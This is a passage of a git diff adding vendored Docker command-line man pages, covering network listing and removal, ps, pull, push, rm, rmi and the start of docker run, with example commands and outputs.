type=builtin` returns both `custom` and `builtin` networks. 
+ +The currently supported filters are: + +* driver +* id (network's id) +* label (`label=` or `label==`) +* name (network's name) +* type (custom|builtin) + +#### Driver + +The `driver` filter matches networks based on their driver. + +The following example matches networks with the `bridge` driver: + +```bash +$ docker network ls --filter driver=bridge +NETWORK ID NAME DRIVER +db9db329f835 test1 bridge +f6e212da9dfd test2 bridge +``` + +#### ID + +The `id` filter matches on all or part of a network's ID. + +The following filter matches all networks with an ID containing the +`63d1ff1f77b0...` string. + +```bash +$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 +NETWORK ID NAME DRIVER +63d1ff1f77b0 dev bridge +``` + +You can also filter for a substring in an ID as this shows: + +```bash +$ docker network ls --filter id=95e74588f40d +NETWORK ID NAME DRIVER +95e74588f40d foo bridge + +$ docker network ls --filter id=95e +NETWORK ID NAME DRIVER +95e74588f40d foo bridge +``` + +#### Label + +The `label` filter matches networks based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches networks with the `usage` label regardless of its value. + +```bash +$ docker network ls -f "label=usage" +NETWORK ID NAME DRIVER +db9db329f835 test1 bridge +f6e212da9dfd test2 bridge +``` + +The following filter matches networks with the `usage` label with the `prod` value. + +```bash +$ docker network ls -f "label=usage=prod" +NETWORK ID NAME DRIVER +f6e212da9dfd test2 bridge +``` + +#### Name + +The `name` filter matches on all or part of a network's name. + +The following filter matches all networks with a name containing the `foobar` string. 
+ +```bash +$ docker network ls --filter name=foobar +NETWORK ID NAME DRIVER +06e7eef0a170 foobar bridge +``` + +You can also filter for a substring in a name as this shows: + +```bash +$ docker network ls --filter name=foo +NETWORK ID NAME DRIVER +95e74588f40d foo bridge +06e7eef0a170 foobar bridge +``` + +#### Type + +The `type` filter supports two values; `builtin` displays predefined networks +(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. + +The following filter matches all user defined networks: + +```bash +$ docker network ls --filter type=custom +NETWORK ID NAME DRIVER +95e74588f40d foo bridge +63d1ff1f77b0 dev bridge +``` + +By having this flag it allows for batch cleanup. For example, use this filter +to delete all user defined networks: + +```bash +$ docker network rm `docker network ls --filter type=custom -q` +``` + +A warning will be issued when trying to remove a network that has containers +attached. + +# OPTIONS + +**-f**, **--filter**=*[]* + filter output based on conditions provided. + +**--format**="*TEMPLATE*" + Pretty-print networks using a Go template. + Valid placeholders: + .ID - Network ID + .Name - Network name + .Driver - Network driver + .Scope - Network scope (local, global) + .IPv6 - Whether IPv6 is enabled on the network or not + .Internal - Whether the network is internal or not + .Labels - All labels assigned to the network + .Label - Value of a specific label for this network. 
For example `{{.Label "project.version"}}` + +**--no-trunc**=*true*|*false* + Do not truncate the output + +**-q**, **--quiet**=*true*|*false* + Only display network IDs + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-network-rm.1.md b/vendor/github.com/docker/docker/man/docker-network-rm.1.md new file mode 100644 index 0000000000..c094a15286 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-network-rm.1.md @@ -0,0 +1,43 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCT 2015 +# NAME +docker-network-rm - remove one or more networks + +# SYNOPSIS +**docker network rm** +[**--help**] +NETWORK [NETWORK...] + +# DESCRIPTION + +Removes one or more networks by name or identifier. To remove a network, +you must first disconnect any containers connected to it. +To remove the network named 'my-network': + +```bash + $ docker network rm my-network +``` + +To delete multiple networks in a single `docker network rm` command, provide +multiple network names or ids. The following example deletes a network with id +`3695c422697f` and a network named `my-network`: + +```bash + $ docker network rm 3695c422697f my-network +``` + +When you specify multiple networks, the command attempts to delete each in turn. +If the deletion of one network fails, the command continues to the next on the +list and tries to delete that. The command reports success or failure for each +deletion. 
+ +# OPTIONS +**NETWORK** + Specify network name or id + +**--help** + Print usage statement + +# HISTORY +OCT 2015, created by Mary Anthony diff --git a/vendor/github.com/docker/docker/man/docker-pause.1.md b/vendor/github.com/docker/docker/man/docker-pause.1.md new file mode 100644 index 0000000000..11eef5321f --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-pause.1.md @@ -0,0 +1,32 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-pause - Pause all processes within one or more containers + +# SYNOPSIS +**docker pause** +CONTAINER [CONTAINER...] + +# DESCRIPTION + +The `docker pause` command suspends all processes in the specified containers. +On Linux, this uses the cgroups freezer. Traditionally, when suspending a process +the `SIGSTOP` signal is used, which is observable by the process being suspended. +With the cgroups freezer the process is unaware, and unable to capture, +that it is being suspended, and subsequently resumed. On Windows, only Hyper-V +containers can be paused. + +See the [cgroups freezer documentation] +(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for +further details. + +# OPTIONS +**--help** + Print usage statement + +# See also +**docker-unpause(1)** to unpause all processes within one or more containers. 
+ +# HISTORY +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-port.1.md b/vendor/github.com/docker/docker/man/docker-port.1.md new file mode 100644 index 0000000000..83e9cf93b6 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-port.1.md @@ -0,0 +1,47 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-port - List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT + +# SYNOPSIS +**docker port** +[**--help**] +CONTAINER [PRIVATE_PORT[/PROTO]] + +# DESCRIPTION +List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT + +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES + + # docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + b650456536c7 busybox:latest top 54 minutes ago Up 54 minutes 0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp test + +## Find out all the ports mapped + + # docker port test + 7890/tcp -> 0.0.0.0:4321 + 9876/tcp -> 0.0.0.0:1234 + +## Find out a specific mapping + + # docker port test 7890/tcp + 0.0.0.0:4321 + + # docker port test 7890 + 0.0.0.0:4321 + +## An example showing error for non-existent mapping + + # docker port test 7890/udp + 2014/06/24 11:53:36 Error: No public port '7890/udp' published for test + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +June 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-ps.1.md b/vendor/github.com/docker/docker/man/docker-ps.1.md new file mode 100644 index 0000000000..d9aa39f8fd --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-ps.1.md @@ -0,0 +1,145 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% FEBRUARY 2015 +# NAME +docker-ps - List containers + +# SYNOPSIS +**docker ps** +[**-a**|**--all**] +[**-f**|**--filter**[=*[]*]] +[**--format**=*"TEMPLATE"*] 
+[**--help**] +[**-l**|**--latest**] +[**-n**[=*-1*]] +[**--no-trunc**] +[**-q**|**--quiet**] +[**-s**|**--size**] + +# DESCRIPTION + +List the containers in the local repository. By default this shows only +the running containers. + +# OPTIONS +**-a**, **--all**=*true*|*false* + Show all containers. Only running containers are shown by default. The default is *false*. + +**-f**, **--filter**=[] + Filter output based on these conditions: + - exited= an exit code of + - label= or label== + - status=(created|restarting|running|paused|exited|dead) + - name= a container's name + - id= a container's ID + - is-task=(true|false) - containers that are a task (part of a service managed by swarm) + - before=(|) + - since=(|) + - ancestor=([:tag]||) - containers created from an image or a descendant. + - volume=(|) + - network=(|) - containers connected to the provided network + - health=(starting|healthy|unhealthy|none) - filters containers based on healthcheck status + +**--format**="*TEMPLATE*" + Pretty-print containers using a Go template. + Valid placeholders: + .ID - Container ID + .Image - Image ID + .Command - Quoted command + .CreatedAt - Time when the container was created. + .RunningFor - Elapsed time since the container was started. + .Ports - Exposed ports. + .Status - Container status. + .Size - Container disk size. + .Names - Container names. + .Labels - All labels assigned to the container. + .Label - Value of a specific label for this container. For example `{{.Label "com.docker.swarm.cpu"}}` + .Mounts - Names of the volumes mounted in this container. + +**--help** + Print usage statement + +**-l**, **--latest**=*true*|*false* + Show only the latest created container (includes all states). The default is *false*. + +**-n**=*-1* + Show n last created containers (includes all states). + +**--no-trunc**=*true*|*false* + Don't truncate output. The default is *false*. + +**-q**, **--quiet**=*true*|*false* + Only display numeric IDs. The default is *false*. 
+ +**-s**, **--size**=*true*|*false* + Display total file sizes. The default is *false*. + +# EXAMPLES +# Display all containers, including non-running + + # docker ps -a + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + a87ecb4f327c fedora:20 /bin/sh -c #(nop) MA 20 minutes ago Exit 0 desperate_brattain + 01946d9d34d8 vpavlin/rhel7:latest /bin/sh -c #(nop) MA 33 minutes ago Exit 0 thirsty_bell + c1d3b0166030 acffc0358b9e /bin/sh -c yum -y up 2 weeks ago Exit 1 determined_torvalds + 41d50ecd2f57 fedora:20 /bin/sh -c #(nop) MA 2 weeks ago Exit 0 drunk_pike + +# Display only IDs of all containers, including non-running + + # docker ps -a -q + a87ecb4f327c + 01946d9d34d8 + c1d3b0166030 + 41d50ecd2f57 + +# Display only IDs of all containers that have the name `determined_torvalds` + + # docker ps -a -q --filter=name=determined_torvalds + c1d3b0166030 + +# Display containers with their commands + + # docker ps --format "{{.ID}}: {{.Command}}" + a87ecb4f327c: /bin/sh -c #(nop) MA + 01946d9d34d8: /bin/sh -c #(nop) MA + c1d3b0166030: /bin/sh -c yum -y up + 41d50ecd2f57: /bin/sh -c #(nop) MA + +# Display containers with their labels in a table + + # docker ps --format "table {{.ID}}\t{{.Labels}}" + CONTAINER ID LABELS + a87ecb4f327c com.docker.swarm.node=ubuntu,com.docker.swarm.storage=ssd + 01946d9d34d8 + c1d3b0166030 com.docker.swarm.node=debian,com.docker.swarm.cpu=6 + 41d50ecd2f57 com.docker.swarm.node=fedora,com.docker.swarm.cpu=3,com.docker.swarm.storage=ssd + +# Display containers with their node label in a table + + # docker ps --format 'table {{.ID}}\t{{(.Label "com.docker.swarm.node")}}' + CONTAINER ID NODE + a87ecb4f327c ubuntu + 01946d9d34d8 + c1d3b0166030 debian + 41d50ecd2f57 fedora + +# Display containers with `remote-volume` mounted + + $ docker ps --filter volume=remote-volume --format "table {{.ID}}\t{{.Mounts}}" + CONTAINER ID MOUNTS + 9c3527ed70ce remote-volume + +# Display containers with a volume mounted in `/data` + + $ docker ps --filter 
volume=/data --format "table {{.ID}}\t{{.Mounts}}" + CONTAINER ID MOUNTS + 9c3527ed70ce remote-volume + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +August 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit +February 2015, updated by André Martins +October 2016, updated by Josh Horwitz diff --git a/vendor/github.com/docker/docker/man/docker-pull.1.md b/vendor/github.com/docker/docker/man/docker-pull.1.md new file mode 100644 index 0000000000..c61d005308 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-pull.1.md @@ -0,0 +1,220 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-pull - Pull an image or a repository from a registry + +# SYNOPSIS +**docker pull** +[**-a**|**--all-tags**] +[**--help**] +NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] + +# DESCRIPTION + +This command pulls down an image or a repository from a registry. If +there is more than one image for a repository (e.g., fedora) then all +images for that repository name can be pulled down including any tags +(see the option **-a** or **--all-tags**). + +If you do not specify a `REGISTRY_HOST`, the command uses Docker's public +registry located at `registry-1.docker.io` by default. + +# OPTIONS +**-a**, **--all-tags**=*true*|*false* + Download all tagged images in the repository. The default is *false*. + +**--help** + Print usage statement + +# EXAMPLES + +### Pull an image from Docker Hub + +To download a particular image, or set of images (i.e., a repository), use +`docker pull`. If no tag is provided, Docker Engine uses the `:latest` tag as a +default. 
This command pulls the `debian:latest` image: + + $ docker pull debian + + Using default tag: latest + latest: Pulling from library/debian + fdd5d7827f33: Pull complete + a3ed95caeb02: Pull complete + Digest: sha256:e7d38b3517548a1c71e41bffe9c8ae6d6d29546ce46bf62159837aad072c90aa + Status: Downloaded newer image for debian:latest + +Docker images can consist of multiple layers. In the example above, the image +consists of two layers; `fdd5d7827f33` and `a3ed95caeb02`. + +Layers can be reused by images. For example, the `debian:jessie` image shares +both layers with `debian:latest`. Pulling the `debian:jessie` image therefore +only pulls its metadata, but not its layers, because all layers are already +present locally: + + $ docker pull debian:jessie + + jessie: Pulling from library/debian + fdd5d7827f33: Already exists + a3ed95caeb02: Already exists + Digest: sha256:a9c958be96d7d40df920e7041608f2f017af81800ca5ad23e327bc402626b58e + Status: Downloaded newer image for debian:jessie + +To see which images are present locally, use the **docker-images(1)** +command: + + $ docker images + + REPOSITORY TAG IMAGE ID CREATED SIZE + debian jessie f50f9524513f 5 days ago 125.1 MB + debian latest f50f9524513f 5 days ago 125.1 MB + +Docker uses a content-addressable image store, and the image ID is a SHA256 +digest covering the image's configuration and layers. In the example above, +`debian:jessie` and `debian:latest` have the same image ID because they are +actually the *same* image tagged with different names. Because they are the +same image, their layers are stored only once and do not consume extra disk +space. + +For more information about images, layers, and the content-addressable store, +refer to [understand images, containers, and storage drivers](https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/) +in the online documentation. + + +## Pull an image by digest (immutable identifier) + +So far, you've pulled images by their name (and "tag"). 
Using names and tags is +a convenient way to work with images. When using tags, you can `docker pull` an +image again to make sure you have the most up-to-date version of that image. +For example, `docker pull ubuntu:14.04` pulls the latest version of the Ubuntu +14.04 image. + +In some cases you don't want images to be updated to newer versions, but prefer +to use a fixed version of an image. Docker enables you to pull an image by its +*digest*. When pulling an image by digest, you specify *exactly* which version +of an image to pull. Doing so, allows you to "pin" an image to that version, +and guarantee that the image you're using is always the same. + +To know the digest of an image, pull the image first. Let's pull the latest +`ubuntu:14.04` image from Docker Hub: + + $ docker pull ubuntu:14.04 + + 14.04: Pulling from library/ubuntu + 5a132a7e7af1: Pull complete + fd2731e4c50c: Pull complete + 28a2f68d1120: Pull complete + a3ed95caeb02: Pull complete + Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + Status: Downloaded newer image for ubuntu:14.04 + +Docker prints the digest of the image after the pull has finished. In the example +above, the digest of the image is: + + sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +Docker also prints the digest of an image when *pushing* to a registry. This +may be useful if you want to pin to a version of the image you just pushed. 
+ +A digest takes the place of the tag when pulling an image, for example, to +pull the above image by digest, run the following command: + + $ docker pull ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + + sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2: Pulling from library/ubuntu + 5a132a7e7af1: Already exists + fd2731e4c50c: Already exists + 28a2f68d1120: Already exists + a3ed95caeb02: Already exists + Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + +Digest can also be used in the `FROM` of a Dockerfile, for example: + + FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 + MAINTAINER some maintainer + +> **Note**: Using this feature "pins" an image to a specific version in time. +> Docker will therefore not pull updated versions of an image, which may include +> security updates. If you want to pull an updated image, you need to change the +> digest accordingly. + +## Pulling from a different registry + +By default, `docker pull` pulls images from Docker Hub. It is also possible to +manually specify the path of a registry to pull from. For example, if you have +set up a local registry, you can specify its path to pull from it. A registry +path is similar to a URL, but does not contain a protocol specifier (`https://`). + +The following command pulls the `testing/test-image` image from a local registry +listening on port 5000 (`myregistry.local:5000`): + + $ docker pull myregistry.local:5000/testing/test-image + +Registry credentials are managed by **docker-login(1)**. + +Docker uses the `https://` protocol to communicate with a registry, unless the +registry is allowed to be accessed over an insecure connection. 
Refer to the +[insecure registries](https://docs.docker.com/engine/reference/commandline/daemon/#insecure-registries) +section in the online documentation for more information. + + +## Pull a repository with multiple images + +By default, `docker pull` pulls a *single* image from the registry. A repository +can contain multiple images. To pull all images from a repository, provide the +`-a` (or `--all-tags`) option when using `docker pull`. + +This command pulls all images from the `fedora` repository: + + $ docker pull --all-tags fedora + + Pulling repository fedora + ad57ef8d78d7: Download complete + 105182bb5e8b: Download complete + 511136ea3c5a: Download complete + 73bd853d2ea5: Download complete + .... + + Status: Downloaded newer image for fedora + +After the pull has completed use the `docker images` command to see the +images that were pulled. The example below shows all the `fedora` images +that are present locally: + + $ docker images fedora + + REPOSITORY TAG IMAGE ID CREATED SIZE + fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB + fedora 20 105182bb5e8b 5 days ago 372.7 MB + fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB + fedora latest 105182bb5e8b 5 days ago 372.7 MB + + +## Canceling a pull + +Killing the `docker pull` process, for example by pressing `CTRL-c` while it is +running in a terminal, will terminate the pull operation. + + $ docker pull fedora + + Using default tag: latest + latest: Pulling from library/fedora + a3ed95caeb02: Pulling fs layer + 236608c7b546: Pulling fs layer + ^C + +> **Note**: Technically, the Engine terminates a pull operation when the +> connection between the Docker Engine daemon and the Docker Engine client +> initiating the pull is lost. If the connection with the Engine daemon is +> lost for other reasons than a manual interaction, the pull is also aborted. + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. 
+June 2014, updated by Sven Dowideit +August 2014, updated by Sven Dowideit +April 2015, updated by John Willis +April 2015, updated by Mary Anthony for v2 +September 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-push.1.md b/vendor/github.com/docker/docker/man/docker-push.1.md new file mode 100644 index 0000000000..847e66d2e4 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-push.1.md @@ -0,0 +1,63 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-push - Push an image or a repository to a registry + +# SYNOPSIS +**docker push** +[**--help**] +NAME[:TAG] | [REGISTRY_HOST[:REGISTRY_PORT]/]NAME[:TAG] + +# DESCRIPTION + +Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) +registry or to a self-hosted one. + +Refer to **docker-tag(1)** for more information about valid image and tag names. + +Killing the **docker push** process, for example by pressing **CTRL-c** while it +is running in a terminal, terminates the push operation. + +Registry credentials are managed by **docker-login(1)**. + + +# OPTIONS + +**--disable-content-trust** + Skip image verification (default true) + +**--help** + Print usage statement + +# EXAMPLES + +## Pushing a new image to a registry + +First save the new image by finding the container ID (using **docker ps**) +and then committing it to a new image name. Note that only a-z0-9-_. are +allowed when naming images: + + # docker commit c16378f943fe rhel-httpd + +Now, push the image to the registry using the image ID. In this example the +registry is on host named `registry-host` and listening on port `5000`. 
To do +this, tag the image with the host name or IP address, and the port of the +registry: + + # docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd + # docker push registry-host:5000/myadmin/rhel-httpd + +Check that this worked by running: + + # docker images + +You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` +listed. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 +June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-rename.1.md b/vendor/github.com/docker/docker/man/docker-rename.1.md new file mode 100644 index 0000000000..eaeea5c6e0 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-rename.1.md @@ -0,0 +1,15 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% OCTOBER 2014 +# NAME +docker-rename - Rename a container + +# SYNOPSIS +**docker rename** +CONTAINER NEW_NAME + +# OPTIONS +There are no available options. + +# DESCRIPTION +Rename a container. Container may be running, paused or stopped. diff --git a/vendor/github.com/docker/docker/man/docker-restart.1.md b/vendor/github.com/docker/docker/man/docker-restart.1.md new file mode 100644 index 0000000000..271c4eee1b --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-restart.1.md @@ -0,0 +1,26 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-restart - Restart one or more containers + +# SYNOPSIS +**docker restart** +[**--help**] +[**-t**|**--time**[=*10*]] +CONTAINER [CONTAINER...] + +# DESCRIPTION +Restart each container listed. + +# OPTIONS +**--help** + Print usage statement + +**-t**, **--time**=*10* + Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds. 
+ +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-rm.1.md b/vendor/github.com/docker/docker/man/docker-rm.1.md new file mode 100644 index 0000000000..2105288d0d --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-rm.1.md @@ -0,0 +1,72 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-rm - Remove one or more containers + +# SYNOPSIS +**docker rm** +[**-f**|**--force**] +[**-l**|**--link**] +[**-v**|**--volumes**] +CONTAINER [CONTAINER...] + +# DESCRIPTION + +**docker rm** will remove one or more containers from the host node. The +container name or ID can be used. This does not remove images. You cannot +remove a running container unless you use the **-f** option. To see all +containers on a host use the **docker ps -a** command. + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--force**=*true*|*false* + Force the removal of a running container (uses SIGKILL). The default is *false*. + +**-l**, **--link**=*true*|*false* + Remove the specified link and not the underlying container. The default is *false*. + +**-v**, **--volumes**=*true*|*false* + Remove the volumes associated with the container. The default is *false*. + +# EXAMPLES + +## Removing a container using its ID + +To remove a container using its ID, find either from a **docker ps -a** +command, or use the ID returned from the **docker run** command, or retrieve +it from a file used to store it using the **docker run --cidfile**: + + docker rm abebf7571666 + +## Removing a container using the container name + +The name of the container can be found using the **docker ps -a** +command. 
Then use that name as follows:
+
+    docker rm hopeful_morse
+
+## Removing a container and all associated volumes
+
+    $ docker rm -v redis
+    redis
+
+This command will remove the container and any volumes associated with it.
+Note that if a volume was specified with a name, it will not be removed.
+
+    $ docker create -v awesome:/foo -v /bar --name hello redis
+    hello
+    $ docker rm -v hello
+
+In this example, the volume for `/foo` will remain intact, but the volume for
+`/bar` will be removed. The same behavior holds for volumes inherited with
+`--volumes-from`.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit
+July 2014, updated by Sven Dowideit
+August 2014, updated by Sven Dowideit
diff --git a/vendor/github.com/docker/docker/man/docker-rmi.1.md b/vendor/github.com/docker/docker/man/docker-rmi.1.md
new file mode 100644
index 0000000000..35bf8aac6a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-rmi.1.md
@@ -0,0 +1,42 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-rmi - Remove one or more images
+
+# SYNOPSIS
+**docker rmi**
+[**-f**|**--force**]
+[**--help**]
+[**--no-prune**]
+IMAGE [IMAGE...]
+
+# DESCRIPTION
+
+Removes one or more images from the host node. This does not remove images from
+a registry. You cannot remove an image of a running container unless you use the
+**-f** option. To see all images on a host use the **docker images** command.
+
+# OPTIONS
+**-f**, **--force**=*true*|*false*
+   Force removal of the image. The default is *false*.
+
+**--help**
+   Print usage statement
+
+**--no-prune**=*true*|*false*
+   Do not delete untagged parents. The default is *false*.
+ +# EXAMPLES + +## Removing an image + +Here is an example of removing an image: + + docker rmi fedora/httpd + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +April 2015, updated by Mary Anthony for v2 diff --git a/vendor/github.com/docker/docker/man/docker-run.1.md b/vendor/github.com/docker/docker/man/docker-run.1.md new file mode 100644 index 0000000000..8c1018a1e2 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-run.1.md @@ -0,0 +1,1055 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-run - Run a command in a new container + +# SYNOPSIS +**docker run** +[**-a**|**--attach**[=*[]*]] +[**--add-host**[=*[]*]] +[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] +[**--blkio-weight-device**[=*[]*]] +[**--cpu-shares**[=*0*]] +[**--cap-add**[=*[]*]] +[**--cap-drop**[=*[]*]] +[**--cgroup-parent**[=*CGROUP-PATH*]] +[**--cidfile**[=*CIDFILE*]] +[**--cpu-count**[=*0*]] +[**--cpu-percent**[=*0*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpu-rt-period**[=*0*]] +[**--cpu-rt-runtime**[=*0*]] +[**--cpus**[=*0.0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**-d**|**--detach**] +[**--detach-keys**[=*[]*]] +[**--device**[=*[]*]] +[**--device-read-bps**[=*[]*]] +[**--device-read-iops**[=*[]*]] +[**--device-write-bps**[=*[]*]] +[**--device-write-iops**[=*[]*]] +[**--dns**[=*[]*]] +[**--dns-option**[=*[]*]] +[**--dns-search**[=*[]*]] +[**-e**|**--env**[=*[]*]] +[**--entrypoint**[=*ENTRYPOINT*]] +[**--env-file**[=*[]*]] +[**--expose**[=*[]*]] +[**--group-add**[=*[]*]] +[**-h**|**--hostname**[=*HOSTNAME*]] +[**--help**] +[**--init**] +[**--init-path**[=*[]*]] +[**-i**|**--interactive**] +[**--ip**[=*IPv4-ADDRESS*]] +[**--ip6**[=*IPv6-ADDRESS*]] +[**--ipc**[=*IPC*]] +[**--isolation**[=*default*]] +[**--kernel-memory**[=*KERNEL-MEMORY*]] +[**-l**|**--label**[=*[]*]] 
+[**--label-file**[=*[]*]] +[**--link**[=*[]*]] +[**--link-local-ip**[=*[]*]] +[**--log-driver**[=*[]*]] +[**--log-opt**[=*[]*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--mac-address**[=*MAC-ADDRESS*]] +[**--memory-reservation**[=*MEMORY-RESERVATION*]] +[**--memory-swap**[=*LIMIT*]] +[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] +[**--name**[=*NAME*]] +[**--network-alias**[=*[]*]] +[**--network**[=*"bridge"*]] +[**--oom-kill-disable**] +[**--oom-score-adj**[=*0*]] +[**-P**|**--publish-all**] +[**-p**|**--publish**[=*[]*]] +[**--pid**[=*[PID]*]] +[**--userns**[=*[]*]] +[**--pids-limit**[=*PIDS_LIMIT*]] +[**--privileged**] +[**--read-only**] +[**--restart**[=*RESTART*]] +[**--rm**] +[**--security-opt**[=*[]*]] +[**--storage-opt**[=*[]*]] +[**--stop-signal**[=*SIGNAL*]] +[**--stop-timeout**[=*TIMEOUT*]] +[**--shm-size**[=*[]*]] +[**--sig-proxy**[=*true*]] +[**--sysctl**[=*[]*]] +[**-t**|**--tty**] +[**--tmpfs**[=*[CONTAINER-DIR[:]*]] +[**-u**|**--user**[=*USER*]] +[**--ulimit**[=*[]*]] +[**--uts**[=*[]*]] +[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] +[**--volume-driver**[=*DRIVER*]] +[**--volumes-from**[=*[]*]] +[**-w**|**--workdir**[=*WORKDIR*]] +IMAGE [COMMAND] [ARG...] + +# DESCRIPTION + +Run a process in a new container. **docker run** starts a process with its own +file system, its own networking, and its own isolated process tree. The IMAGE +which starts the process may define defaults related to the process that will be +run in the container, the networking to expose, and more, but **docker run** +gives final control to the operator or administrator who starts the container +from the image. For that reason **docker run** has more options than any other +Docker command. + +If the IMAGE is not already loaded then **docker run** will pull the IMAGE, and +all image dependencies, from the repository in the same way running **docker +pull** IMAGE, before it starts the container from that image. 
+ +# OPTIONS +**-a**, **--attach**=[] + Attach to STDIN, STDOUT or STDERR. + + In foreground mode (the default when **-d** +is not specified), **docker run** can start the process in the container +and attach the console to the process's standard input, output, and standard +error. It can even pretend to be a TTY (this is what most commandline +executables expect) and pass along signals. The **-a** option can be set for +each of stdin, stdout, and stderr. + +**--add-host**=[] + Add a custom host-to-IP mapping (host:ip) + + Add a line to /etc/hosts. The format is hostname:ip. The **--add-host** +option can be set multiple times. + +**--blkio-weight**=*0* + Block IO weight (relative weight) accepts a weight value between 10 and 1000. + +**--blkio-weight-device**=[] + Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). + +**--cpu-shares**=*0* + CPU shares (relative weight) + + By default, all containers get the same proportion of CPU cycles. This proportion +can be modified by changing the container's CPU share weighting relative +to the weighting of all other running containers. + +To modify the proportion from the default of 1024, use the **--cpu-shares** +flag to set the weighting to 2 or higher. + +The proportion will only apply when CPU-intensive processes are running. +When tasks in one container are idle, other containers can use the +left-over CPU time. The actual amount of CPU time will vary depending on +the number of containers running on the system. + +For example, consider three containers, one has a cpu-share of 1024 and +two others have a cpu-share setting of 512. When processes in all three +containers attempt to use 100% of CPU, the first container would receive +50% of the total CPU time. If you add a fourth container with a cpu-share +of 1024, the first container only gets 33% of the CPU. The remaining containers +receive 16.5%, 16.5% and 33% of the CPU. 
+
+On a multi-core system, the shares of CPU time are distributed over all CPU
+cores. Even if a container is limited to less than 100% of CPU time, it can
+use 100% of each individual CPU core.
+
+For example, consider a system with more than three cores. If you start one
+container **{C0}** with **-c=512** running one process, and another container
+**{C1}** with **-c=1024** running two processes, this can result in the following
+division of CPU shares:
+
